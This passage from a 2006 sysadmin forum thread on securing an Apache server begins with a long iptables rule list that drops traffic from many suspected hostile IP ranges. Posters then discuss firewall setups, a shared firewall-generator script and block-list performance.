$IPT -A INPUT -p ALL -s 200.96.82.0/24 -j DROP
$IPT -A INPUT -p ALL -s 201.134.134.0/24 -j DROP
$IPT -A INPUT -p ALL -s 201.227.89.0/24 -j DROP
$IPT -A INPUT -p ALL -s 201.27.49.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.125.42.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.133.209.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.142.221.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.150.196.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.174.109.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.177.25.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.181.97.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.222.30.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.28.77.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.58.85.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.71.104.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.75.4.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.128.7.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.130.198.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.130.216.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.130.232.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.142.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.146.102.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.172.176.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.31.191.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.63.5.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.79.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 204.11.234.0/24 -j DROP
$IPT -A INPUT -p ALL -s 204.202.22.0/24 -j DROP
$IPT -A INPUT -p ALL -s 205.134.236.0/24 -j DROP
$IPT -A INPUT -p ALL -s 205.237.29.0/24 -j DROP
$IPT -A INPUT -p ALL -s 205.252.5.0/24 -j DROP
$IPT -A INPUT -p ALL -s 206.225.82.0/24 -j DROP
$IPT -A INPUT -p ALL -s 206.225.87.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.210.64.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.58.138.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.58.139.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.58.146.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.58.161.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.71.17.0/24 -j DROP
$IPT -A INPUT -p ALL -s 208.186.169.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.123.8.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.126.144.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.133.117.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.135.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.147.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.189.226.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.190.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.215.164.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.249.12.0/24 -j DROP
$IPT -A INPUT -p ALL -s 210.55.199.0/24 -j DROP
$IPT -A INPUT -p ALL -s 210.66.146.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.117.143.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.118.97.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.131.127.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.139.227.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.155.84.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.201.202.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.232.77.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.32.67.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.36.108.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.55.160.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.55.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.58.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.64.86.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.69.166.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.69.173.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.71.84.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.73.103.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.227.212.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.127.58.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.148.180.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.15.6.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.153.59.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.159.152.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.107.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.135.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.143.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.165.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.176.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.20.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.216.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.218.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.226.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.230.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.243.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.253.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.94.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.172.173.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.172.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.172.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.174.252.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.19.43.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.198.196.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.221.217.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.6.204.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.6.2.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.65.209.0/24 -j DROP
$IPT -A INPUT -p ALL -s 222.124.24.0/24 -j DROP

Rgds...Geoff

Re: Securing Apache with Perl

Steven E. Protter — Tue, 18 Apr 2006 09:58:36 GMT

You should not have to go through this.

I've got several publically exposed servers and manage to shut most of this down with firewall configuration.

I'm in the process of moving to a cluster that will also be behind a hardware based firewall.

I'd be interested to see your entire iptables configuration.

See my profile for a link, it would not be good to post here.

I have a firewall code generator script that might help. http://www.hpux.ws/firewall.tar.gz

You should be able to figure it out.

I've noted some flaws with iptables that seem to let traffic in on certain ports that are supposedly blocked after repeated pounding. Thats why I'm moving my operation behind a hardware firewall.

SEP

Re: Securing Apache with Perl

Geoff Wild — Tue, 18 Apr 2006 10:38:34 GMT

Steven - I keep getting

Gateway Timeout
The following error occurred:
[code=GATEWAY_TIMEOUT] A gateway timeout occurred. The server is unreachable. Retry the request.

from your form - go to chat?

http://www.cmve.net/voc/voc.php

Rgds...Geoff

Re: Securing Apache with Perl

Steven E. Protter — Wed, 19 Apr 2006 18:18:22 GMT

Sorry Geoff,

http://www.hpux.ws/firewall.tar.gz

I was offline for the last day of passover.

I will try and reach out to you in some way, mid morning your time after my Thursday workday is complete.

I've updated the scripts and included a few of the configuration files. I'm more than willing to work with you on this, because its my own production code and I want it to work.

Its a very NOT permissive setup, but with a few entries for local networks it will play nicely with other boxes at your ISP.

I'm going to use your block list posted earlier on my new production servers, seems to make sense not to let known hackers in.

I've also run into some firewall performance problems when my firewall block list hits 100,000 records. I will make some improvements in the code as I move along and continue to post to the link above.

SEP